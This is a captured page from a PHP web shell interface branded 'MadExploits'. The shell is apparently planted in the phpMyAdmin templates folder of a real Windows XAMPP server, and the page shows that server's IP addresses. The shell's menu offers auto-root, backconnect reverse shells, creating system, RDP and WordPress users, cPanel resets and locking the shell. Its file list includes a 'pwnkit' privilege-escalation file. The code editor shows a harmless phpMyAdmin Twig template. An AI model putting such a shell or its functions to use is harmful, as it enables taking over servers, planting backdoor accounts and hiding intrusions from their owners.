Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
server /
engines /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
index.twig
946
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
show.twig
1.19
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : show.twig
<h2> {{ get_image('b_engine') }} {% trans 'Storage engines' %} </h2> {% if engine is not empty %} <h2> {{ get_image('b_engine') }} {{ engine.title }} {{ show_mysql_docu(engine.help_page) }} </h2> <p><em>{{ engine.comment }}</em></p> {% if engine.info_pages is not empty and engine.info_pages is iterable %} <p> <strong>[</strong> {% if page is empty %} <strong>{% trans 'Variables' %}</strong> {% else %} <a href="{{ url('/server/engines/' ~ engine.engine) }}"> {% trans 'Variables' %} </a> {% endif %} {% for current, label in engine.info_pages %} <strong>|</strong> {% if page is defined and page == current %} <strong>{{ label }}</strong> {% else %} <a href="{{ url('/server/engines/' ~ engine.engine ~ '/' ~ current) }}"> {{ label }} </a> {% endif %} {% endfor %} <strong>]</strong> </p> {% endif %} {% if engine.page is not empty %} {{ engine.page|raw }} {% else %} <p>{{ engine.support }}</p> {{ engine.variables|raw }} {% endif %} {% else %} <p>{{ 'Unknown storage engine.'|trans|error }}</p> {% endif %}
Close